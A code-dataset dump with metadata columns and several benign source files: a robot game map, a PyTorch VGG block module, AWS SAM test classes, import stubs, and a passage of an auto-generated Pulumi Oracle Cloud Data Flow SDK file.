hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2491a71fc803b278270e6545e0aa997ad42cff7b
| 1,081
|
py
|
Python
|
rgkit/maps/afffsdd/fourcorners.py
|
outkine/rgkit
|
eb5d80c0d1815cc016bf7c584310120991760cc8
|
[
"Unlicense"
] | 1
|
2021-11-04T22:19:59.000Z
|
2021-11-04T22:19:59.000Z
|
rgkit/maps/afffsdd/fourcorners.py
|
outkine/rgkit
|
eb5d80c0d1815cc016bf7c584310120991760cc8
|
[
"Unlicense"
] | null | null | null |
rgkit/maps/afffsdd/fourcorners.py
|
outkine/rgkit
|
eb5d80c0d1815cc016bf7c584310120991760cc8
|
[
"Unlicense"
] | 2
|
2021-02-16T09:37:47.000Z
|
2021-11-04T22:30:51.000Z
|
# Map by afffsdd
# A map with four corners, with bots spawning in each of them.
# flake8: noqa
# TODO: Format this file.
{'spawn': [(1, 1), (14, 1), (15, 1), (16, 1), (17, 1), (1, 2), (1, 3), (1, 4), (17, 14), (17, 15), (17, 16), (1, 17), (2, 17), (3, 17), (4, 17), (17, 17)], 'obstacle': [(0, 0), (1, 0), (2, 0), (3, 0), (4, 0), (5, 0), (6, 0), (7, 0), (8, 0), (9, 0), (10, 0), (11, 0), (12, 0), (13, 0), (14, 0), (15, 0), (16, 0), (17, 0), (18, 0), (0, 1), (13, 1), (18, 1), (0, 2), (13, 2), (18, 2), (0, 3), (13, 3), (18, 3), (0, 4), (13, 4), (18, 4), (0, 5), (1, 5), (2, 5), (3, 5), (4, 5), (18, 5), (0, 6), (18, 6), (0, 7), (18, 7), (0, 8), (18, 8), (0, 9), (18, 9), (0, 10), (18, 10), (0, 11), (18, 11), (0, 12), (18, 12), (0, 13), (14, 13), (15, 13), (16, 13), (17, 13), (18, 13), (0, 14), (5, 14), (18, 14), (0, 15), (5, 15), (18, 15), (0, 16), (5, 16), (18, 16), (0, 17), (5, 17), (18, 17), (0, 18), (1, 18), (2, 18), (3, 18), (4, 18), (5, 18), (6, 18), (7, 18), (8, 18), (9, 18), (10, 18), (11, 18), (12, 18), (13, 18), (14, 18), (15, 18), (16, 18), (17, 18), (18, 18)]}
| 180.166667
| 959
| 0.379278
| 231
| 1,081
| 1.774892
| 0.17316
| 0.009756
| 0.02439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.367612
| 0.217391
| 1,081
| 5
| 960
| 216.2
| 0.117021
| 0.103608
| 0
| 0
| 0
| 0
| 0.013485
| 0
| 0
| 0
| 0
| 0.2
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24a2fcbef82d9b606c9644dcb37319a8bd660a8d
| 51
|
py
|
Python
|
recommender-system/helpers/Time.py
|
sevmardi/ml-projects
|
0eb218c77cda61285cfcf599599ff28a8a8deba7
|
[
"MIT"
] | null | null | null |
recommender-system/helpers/Time.py
|
sevmardi/ml-projects
|
0eb218c77cda61285cfcf599599ff28a8a8deba7
|
[
"MIT"
] | 7
|
2020-06-06T01:26:08.000Z
|
2022-02-10T11:26:58.000Z
|
recommender-system/helpers/Time.py
|
sevmardi/ml-projects
|
0eb218c77cda61285cfcf599599ff28a8a8deba7
|
[
"MIT"
] | null | null | null |
import time
def start():
return time.time()
| 7.285714
| 22
| 0.627451
| 7
| 51
| 4.571429
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.254902
| 51
| 6
| 23
| 8.5
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
24b1b484e2a0f69ead351a4d7c8ddaa49aeb42ed
| 612
|
py
|
Python
|
src/openbiolink/graph_creation/file_processor/onto/__init__.py
|
jerryhluo/OpenBioLink
|
6fc073af978daec0b0db5938b73beed37f57f495
|
[
"MIT"
] | 97
|
2019-11-26T09:53:18.000Z
|
2022-03-19T10:33:10.000Z
|
src/openbiolink/graph_creation/file_processor/onto/__init__.py
|
jerryhluo/OpenBioLink
|
6fc073af978daec0b0db5938b73beed37f57f495
|
[
"MIT"
] | 67
|
2019-12-09T21:01:52.000Z
|
2021-12-21T15:19:41.000Z
|
src/openbiolink/graph_creation/file_processor/onto/__init__.py
|
jerryhluo/OpenBioLink
|
6fc073af978daec0b0db5938b73beed37f57f495
|
[
"MIT"
] | 20
|
2020-01-13T23:02:25.000Z
|
2022-03-16T21:43:31.000Z
|
from openbiolink.graph_creation.file_processor.onto.ontoDoIsAProcessor import OntoDoIsAProcessor
from openbiolink.graph_creation.file_processor.onto.ontoGoIsAProcessor import OntoGoIsAProcessor
from openbiolink.graph_creation.file_processor.onto.ontoGoPartOfProcessor import OntoGoPartOfProcessor
from openbiolink.graph_creation.file_processor.onto.ontoHpoIsAProcessor import OntoHpoIsAProcessor
from openbiolink.graph_creation.file_processor.onto.ontoUberonIsAProcessor import OntoUberonIsAProcessor
from openbiolink.graph_creation.file_processor.onto.ontoUberonPartOfProcessor import OntoUberonPartOfProcessor
| 87.428571
| 110
| 0.921569
| 60
| 612
| 9.2
| 0.233333
| 0.163043
| 0.217391
| 0.304348
| 0.48913
| 0.48913
| 0.48913
| 0
| 0
| 0
| 0
| 0
| 0.039216
| 612
| 6
| 111
| 102
| 0.938776
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
24bc4bd3f3ec771dc7f9bd9eefcdca177516a3ea
| 1,679
|
py
|
Python
|
models/VGG/vgg_funcs.py
|
abhijeetdhupia/ImgClassSeg
|
e841b36d170e4989d36146d4fc3deb1fe6fc7b36
|
[
"MIT"
] | null | null | null |
models/VGG/vgg_funcs.py
|
abhijeetdhupia/ImgClassSeg
|
e841b36d170e4989d36146d4fc3deb1fe6fc7b36
|
[
"MIT"
] | null | null | null |
models/VGG/vgg_funcs.py
|
abhijeetdhupia/ImgClassSeg
|
e841b36d170e4989d36146d4fc3deb1fe6fc7b36
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.modules.activation import ReLU
import torch.optim as optim
class DoubleConv(nn.Module):
"""Some Information about MyModule"""
def __init__(self, in_channels, out_channels):
super(DoubleConv, self).__init__()
self.convblock2 = nn.Sequential(
nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(out_channels),
nn.ReLU(),
nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(out_channels),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, stride=2)
)
def forward(self, x):
return self.convblock2(x)
class ThreeConv(nn.Module):
"""Some Information about ThreeConv"""
def __init__(self, in_channels, out_channels):
super(ThreeConv, self).__init__()
self.convblock3 = nn.Sequential(
nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(out_channels),
nn.ReLU(),
nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(out_channels),
nn.ReLU(),
nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(out_channels),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, stride=2)
)
def forward(self, x):
return self.convblock3(x)
| 39.97619
| 112
| 0.650983
| 216
| 1,679
| 4.819444
| 0.194444
| 0.211335
| 0.273775
| 0.169068
| 0.763689
| 0.709894
| 0.709894
| 0.709894
| 0.638809
| 0.638809
| 0
| 0.02728
| 0.235855
| 1,679
| 42
| 113
| 39.97619
| 0.7841
| 0.038118
| 0
| 0.583333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.138889
| 0.055556
| 0.361111
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24ff43902d9ee3947a0b840767671eaf3c6068c6
| 2,345
|
py
|
Python
|
tests/integration/unit_test/test_unit_test_java8_al2.py
|
hawflau/aws-sam-cli-app-templates
|
47e7100659c1cdf8c1ae1d8eba36de5dbd01623c
|
[
"Apache-2.0"
] | 173
|
2020-08-25T14:07:05.000Z
|
2022-03-30T06:06:50.000Z
|
tests/integration/unit_test/test_unit_test_java8_al2.py
|
hawflau/aws-sam-cli-app-templates
|
47e7100659c1cdf8c1ae1d8eba36de5dbd01623c
|
[
"Apache-2.0"
] | 98
|
2020-09-08T00:18:55.000Z
|
2022-03-21T06:49:48.000Z
|
tests/integration/unit_test/test_unit_test_java8_al2.py
|
hawflau/aws-sam-cli-app-templates
|
47e7100659c1cdf8c1ae1d8eba36de5dbd01623c
|
[
"Apache-2.0"
] | 109
|
2020-09-02T17:34:10.000Z
|
2022-03-28T03:47:38.000Z
|
from unittest import skip
from tests.integration.unit_test.unit_test_base import UnitTestBase
class UnitTest_java8_al2_cookiecutter_aws_sam_hello_java_gradle(UnitTestBase.JavaUnitTestGradleBase):
directory = "java8.al2/cookiecutter-aws-sam-hello-java-gradle"
code_directories = ["HelloWorldFunction"]
class UnitTest_java8_al2_cookiecutter_aws_sam_hello_java_maven(UnitTestBase.JavaUnitTestMavenBase):
directory = "java8.al2/cookiecutter-aws-sam-hello-java-maven"
code_directories = ["HelloWorldFunction"]
class UnitTest_java8_al2_cookiecutter_aws_sam_eventbridge_hello_java_gradle(UnitTestBase.JavaUnitTestGradleBase):
directory = "java8.al2/cookiecutter-aws-sam-eventbridge-hello-java-gradle"
code_directories = ["HelloWorldFunction"]
class UnitTest_java8_al2_cookiecutter_aws_sam_eventbridge_hello_java_maven(UnitTestBase.JavaUnitTestMavenBase):
directory = "java8.al2/cookiecutter-aws-sam-eventbridge-hello-java-maven"
code_directories = ["HelloWorldFunction"]
@skip("eventbridge schema app requires credential to pull missing files, skip")
class UnitTest_java8_al2_cookiecutter_aws_sam_eventbridge_schema_app_java_gradle(UnitTestBase.JavaUnitTestGradleBase):
directory = "java8.al2/cookiecutter-aws-sam-eventbridge-schema-app-java-gradle"
code_directories = ["HelloWorldFunction"]
@skip("eventbridge schema app requires credential to pull missing files, skip")
class UnitTest_java8_al2_cookiecutter_aws_sam_eventbridge_schema_app_java_maven(UnitTestBase.JavaUnitTestMavenBase):
directory = "java8.al2/cookiecutter-aws-sam-eventbridge-schema-app-java-maven"
code_directories = ["HelloWorldFunction"]
class UnitTest_java8_al2_cookiecutter_aws_sam_step_functions_sample_app_gradle(UnitTestBase.JavaUnitTestGradleBase):
directory = "java8.al2/cookiecutter-aws-sam-hello-java-step-functions-sample-app-gradle"
code_directories = [
"functions/StockBuyer",
"functions/StockChecker",
"functions/StockSeller",
]
class UnitTest_java8_al2_cookiecutter_aws_sam_step_functions_sample_app_maven(UnitTestBase.JavaUnitTestMavenBase):
directory = "java8.al2/cookiecutter-aws-sam-hello-java-step-functions-sample-app-maven"
code_directories = [
"functions/StockBuyer",
"functions/StockChecker",
"functions/StockSeller",
]
| 43.425926
| 118
| 0.81322
| 262
| 2,345
| 6.954198
| 0.156489
| 0.070252
| 0.175631
| 0.201976
| 0.956092
| 0.950055
| 0.950055
| 0.950055
| 0.867728
| 0.838639
| 0
| 0.01518
| 0.101066
| 2,345
| 53
| 119
| 44.245283
| 0.849146
| 0
| 0
| 0.444444
| 0
| 0.055556
| 0.368444
| 0.245629
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.055556
| 0
| 0.722222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
7025f73ad80c8076e262f4fb828675dfe810962c
| 96,140
|
py
|
Python
|
sdk/python/pulumi_oci/dataflow/invoke_run.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/dataflow/invoke_run.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/dataflow/invoke_run.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['InvokeRunArgs', 'InvokeRun']
@pulumi.input_type
class InvokeRunArgs:
def __init__(__self__, *,
compartment_id: pulumi.Input[str],
application_id: Optional[pulumi.Input[str]] = None,
archive_uri: Optional[pulumi.Input[str]] = None,
arguments: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
asynchronous: Optional[pulumi.Input[bool]] = None,
configuration: Optional[pulumi.Input[Mapping[str, Any]]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
driver_shape: Optional[pulumi.Input[str]] = None,
execute: Optional[pulumi.Input[str]] = None,
executor_shape: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
logs_bucket_uri: Optional[pulumi.Input[str]] = None,
metastore_id: Optional[pulumi.Input[str]] = None,
num_executors: Optional[pulumi.Input[int]] = None,
parameters: Optional[pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]]] = None,
spark_version: Optional[pulumi.Input[str]] = None,
warehouse_bucket_uri: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a InvokeRun resource.
:param pulumi.Input[str] compartment_id: (Updatable) The OCID of a compartment.
:param pulumi.Input[str] application_id: The OCID of the associated application. If this value is set, then no value for the execute parameter is required. If this value is not set, then a value for the execute parameter is required, and a new application is created and associated with the new run.
:param pulumi.Input[str] archive_uri: An Oracle Cloud Infrastructure URI of an archive.zip file containing custom dependencies that may be used to support the execution a Python, Java, or Scala application. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[Sequence[pulumi.Input[str]]] arguments: The arguments passed to the running application as command line arguments. An argument is either a plain text or a placeholder. Placeholders are replaced using values from the parameters map. Each placeholder specified must be represented in the parameters map else the request (POST or PUT) will fail with a HTTP 400 status code. Placeholders are specified as `Service Api Spec`, where `name` is the name of the parameter. Example: `[ "--input", "${input_file}", "--name", "John Doe" ]` If "input_file" has a value of "mydata.xml", then the value above will be translated to `--input mydata.xml --name "John Doe"`
:param pulumi.Input[Mapping[str, Any]] configuration: The Spark configuration passed to the running process. See https://spark.apache.org/docs/latest/configuration.html#available-properties Example: { "spark.app.name" : "My App Name", "spark.shuffle.io.maxRetries" : "4" } Note: Not all Spark properties are permitted to be set. Attempting to set a property that is not allowed to be overwritten will cause a 400 status to be returned.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[str] display_name: A user-friendly name that does not have to be unique. Avoid entering confidential information. If this value is not specified, it will be derived from the associated application's displayName or set by API using fileUri's application file name.
:param pulumi.Input[str] driver_shape: The VM shape for the driver. Sets the driver cores and memory.
:param pulumi.Input[str] execute: The input used for spark-submit command. For more details see https://spark.apache.org/docs/latest/submitting-applications.html#launching-applications-with-spark-submit. Supported options include ``--class``, ``--file``, ``--jars``, ``--conf``, ``--py-files``, and main application file with arguments. Example: ``--jars oci://path/to/a.jar,oci://path/to/b.jar --files oci://path/to/a.json,oci://path/to/b.csv --py-files oci://path/to/a.py,oci://path/to/b.py --conf spark.sql.crossJoin.enabled=true --class org.apache.spark.examples.SparkPi oci://path/to/main.jar 10`` Note: If execute is specified together with applicationId, className, configuration, fileUri, language, arguments, parameters during application create/update, or run create/submit, Data Flow service will use derived information from execute input only.
:param pulumi.Input[str] executor_shape: The VM shape for the executors. Sets the executor cores and memory.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] logs_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket where the Spark job logs are to be uploaded. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[str] metastore_id: The OCID of Oracle Cloud Infrastructure Hive Metastore.
:param pulumi.Input[int] num_executors: The number of executor VMs requested.
:param pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]] parameters: An array of name/value pairs used to fill placeholders found in properties like `Application.arguments`. The name must be a string of one or more word characters (a-z, A-Z, 0-9, _). The value can be a string of 0 or more characters of any kind. Example: [ { name: "iterations", value: "10"}, { name: "input_file", value: "mydata.xml" }, { name: "variable_x", value: "${x}"} ]
:param pulumi.Input[str] spark_version: The Spark version utilized to run the application. This value may be set if applicationId is not since the Spark version will be taken from the associated application.
:param pulumi.Input[str] warehouse_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket to be used as default warehouse directory for BATCH SQL runs. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
pulumi.set(__self__, "compartment_id", compartment_id)
if application_id is not None:
pulumi.set(__self__, "application_id", application_id)
if archive_uri is not None:
pulumi.set(__self__, "archive_uri", archive_uri)
if arguments is not None:
pulumi.set(__self__, "arguments", arguments)
if asynchronous is not None:
pulumi.set(__self__, "asynchronous", asynchronous)
if configuration is not None:
pulumi.set(__self__, "configuration", configuration)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if driver_shape is not None:
pulumi.set(__self__, "driver_shape", driver_shape)
if execute is not None:
pulumi.set(__self__, "execute", execute)
if executor_shape is not None:
pulumi.set(__self__, "executor_shape", executor_shape)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if logs_bucket_uri is not None:
pulumi.set(__self__, "logs_bucket_uri", logs_bucket_uri)
if metastore_id is not None:
pulumi.set(__self__, "metastore_id", metastore_id)
if num_executors is not None:
pulumi.set(__self__, "num_executors", num_executors)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if spark_version is not None:
pulumi.set(__self__, "spark_version", spark_version)
if warehouse_bucket_uri is not None:
pulumi.set(__self__, "warehouse_bucket_uri", warehouse_bucket_uri)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
(Updatable) The OCID of a compartment.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of the associated application. If this value is set, then no value for the execute parameter is required. If this value is not set, then a value for the execute parameter is required, and a new application is created and associated with the new run.
"""
return pulumi.get(self, "application_id")
@application_id.setter
def application_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "application_id", value)
@property
@pulumi.getter(name="archiveUri")
def archive_uri(self) -> Optional[pulumi.Input[str]]:
"""
An Oracle Cloud Infrastructure URI of an archive.zip file containing custom dependencies that may be used to support the execution a Python, Java, or Scala application. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "archive_uri")
@archive_uri.setter
def archive_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "archive_uri", value)
@property
@pulumi.getter
def arguments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The arguments passed to the running application as command line arguments. An argument is either a plain text or a placeholder. Placeholders are replaced using values from the parameters map. Each placeholder specified must be represented in the parameters map else the request (POST or PUT) will fail with a HTTP 400 status code. Placeholders are specified as `Service Api Spec`, where `name` is the name of the parameter. Example: `[ "--input", "${input_file}", "--name", "John Doe" ]` If "input_file" has a value of "mydata.xml", then the value above will be translated to `--input mydata.xml --name "John Doe"`
"""
return pulumi.get(self, "arguments")
@arguments.setter
def arguments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "arguments", value)
@property
@pulumi.getter
def asynchronous(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "asynchronous")
@asynchronous.setter
def asynchronous(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "asynchronous", value)
@property
@pulumi.getter
def configuration(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
The Spark configuration passed to the running process. See https://spark.apache.org/docs/latest/configuration.html#available-properties Example: { "spark.app.name" : "My App Name", "spark.shuffle.io.maxRetries" : "4" } Note: Not all Spark properties are permitted to be set. Attempting to set a property that is not allowed to be overwritten will cause a 400 status to be returned.
"""
return pulumi.get(self, "configuration")
@configuration.setter
def configuration(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "configuration", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
A user-friendly name that does not have to be unique. Avoid entering confidential information. If this value is not specified, it will be derived from the associated application's displayName or set by API using fileUri's application file name.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="driverShape")
def driver_shape(self) -> Optional[pulumi.Input[str]]:
"""
The VM shape for the driver. Sets the driver cores and memory.
"""
return pulumi.get(self, "driver_shape")
@driver_shape.setter
def driver_shape(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "driver_shape", value)
@property
@pulumi.getter
def execute(self) -> Optional[pulumi.Input[str]]:
"""
